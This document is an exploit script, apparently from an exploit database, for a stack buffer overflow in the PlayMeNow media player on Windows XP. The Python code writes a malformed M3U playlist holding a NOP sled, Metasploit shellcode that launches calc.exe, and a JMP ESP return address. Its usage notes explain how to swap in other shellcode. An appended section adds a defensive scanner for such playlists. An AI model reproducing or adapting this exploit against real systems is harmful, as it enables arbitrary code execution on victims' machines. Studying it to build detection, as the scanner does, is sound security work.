# Title : PlayMeNow Malformed M3U Playlist WinXP Universal BOF
# Published : 2009-12-19
# Author : loneferret
#!/usr/bin/python
# Vulnerability: PlayMeNow Malformed M3U Playlist WinXP Universal BoF
# Product: PlayMeNow - media player.
# Versions affected: Tested with 7.3 and 7.4
# Tested on: Windows XP Pro SP2/3 & Home SP3
# Author: loneferret
# Original Author: Gr33nG0bL1n
# Reference: http://www.exploit-db.com/exploits/10556
# Date: 19/12/2009
# Usage: Just choose your shellcode and open the created file (PlayMeNow_expl.m3u) with PlayMeNow.
# The offset is 1040, but the return address used brings us into it, so the shellcode is part of our
# offset buffer. Also, yes, the return address does contain \x00. If you want to put in a bigger payload,
# play around with the first & second set of As and those nops.
# Bytes literals and binary mode are used so the file is written byte-for-byte on Python 2 and 3.
buffer = b"\x41" * 465          # first set of As (filler)
buffer += b"\x90" * 110         # NOP sled
# win32_exec -
# EXITFUNC=thread
# CMD=calc.exe Size=164 Encoder=PexFnstenvSub
# http://metasploit.com
buffer += (b"\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc4"
           b"\x5b\x35\x61\x83\xeb\xfc\xe2\xf4\x38\xb3\x71\x61\xc4\x5b\xbe\x24"
           b"\xf8\xd0\x49\x64\xbc\x5a\xda\xea\x8b\x43\xbe\x3e\xe4\x5a\xde\x28"
           b"\x4f\x6f\xbe\x60\x2a\x6a\xf5\xf8\x68\xdf\xf5\x15\xc3\x9a\xff\x6c"
           b"\xc5\x99\xde\x95\xff\x0f\x11\x65\xb1\xbe\xbe\x3e\xe0\x5a\xde\x07"
           b"\x4f\x57\x7e\xea\x9b\x47\x34\x8a\x4f\x47\xbe\x60\x2f\xd2\x69\x45"
           b"\xc0\x98\x04\xa1\xa0\xd0\x75\x51\x41\x9b\x4d\x6d\x4f\x1b\x39\xea"
           b"\xb4\x47\x98\xea\xac\x53\xde\x68\x4f\xdb\x85\x61\xc4\x5b\xbe\x09"
           b"\xf8\x04\x04\x97\xa4\x0d\xbc\x99\x47\x9b\x4e\x31\xac\xb4\xfb\x81"
           b"\xa4\x33\xad\x9f\x4e\x55\x62\x9e\x23\x38\x54\x0d\xa7\x75\x50\x19"
           b"\xa1\x5b\x35\x61")
buffer += b"\x41" * 301         # second set of As: end of our 1040-byte offset buffer
buffer += b"\x8c\x92\x5b\x00"   # 0x005B928C JMP ESP @ autorun.exe (little-endian, includes the \x00)
buffer += b"\xCC" * 2800        # junk
f = open('PlayMeNow_expl.m3u', 'wb')
f.write(buffer)                 # write file
f.close()
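As a defender's counterpart to the script above, here is an added example (not the advisory's own code) that scans an M3U playlist for entries with the shape this exploit relies on: a path entry far longer than any legal path, a NUL byte inside it, and long runs of one repeated byte. The sample playlist, the 260-byte threshold and the 64-byte run length are constructed assumptions.

```python
import re

# Constructed sample playlist (not the advisory's file): two ordinary entries
# followed by one entry shaped like the malformed playlist described above:
# a long run of filler bytes, a four-byte value containing a NUL, more padding.
SAMPLE_M3U = (
    b"#EXTM3U\n"
    b"#EXTINF:123,Sample Artist - Sample Title\n"
    b"C:\\Music\\song.mp3\n"
    + b"A" * 1040 + b"\x8c\x92\x5b\x00" + b"\xcc" * 64 + b"\n"
)

MAX_ENTRY_LEN = 260    # assumption: MAX_PATH on Windows; no real playlist path is longer
FILLER_RUN_RE = re.compile(rb"(.)\1{63,}", re.DOTALL)          # 64+ copies of one byte
CONTROL_RE = re.compile(rb"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")  # never legal in a path


def scan_m3u(data):
    """Return (line_number, reason) findings for playlist entries that look
    like overflow padding rather than file paths. Comment lines (#...) and
    blank lines are skipped; only path entries are inspected."""
    findings = []
    for lineno, line in enumerate(data.split(b"\n"), start=1):
        line = line.rstrip(b"\r")
        if not line or line.startswith(b"#"):
            continue
        if len(line) > MAX_ENTRY_LEN:
            findings.append((lineno, "entry is %d bytes, longer than MAX_PATH" % len(line)))
        if CONTROL_RE.search(line):
            findings.append((lineno, "control or NUL bytes inside a path"))
        run = FILLER_RUN_RE.search(line)
        if run:
            findings.append((lineno, "run of %d repeated bytes" % len(run.group(0))))
    return findings


if __name__ == "__main__":
    for lineno, reason in scan_m3u(SAMPLE_M3U):
        print("line %d: %s" % (lineno, reason))
```

Any finding is a reason to quarantine the playlist before a legacy player opens it; a clean playlist returns an empty list.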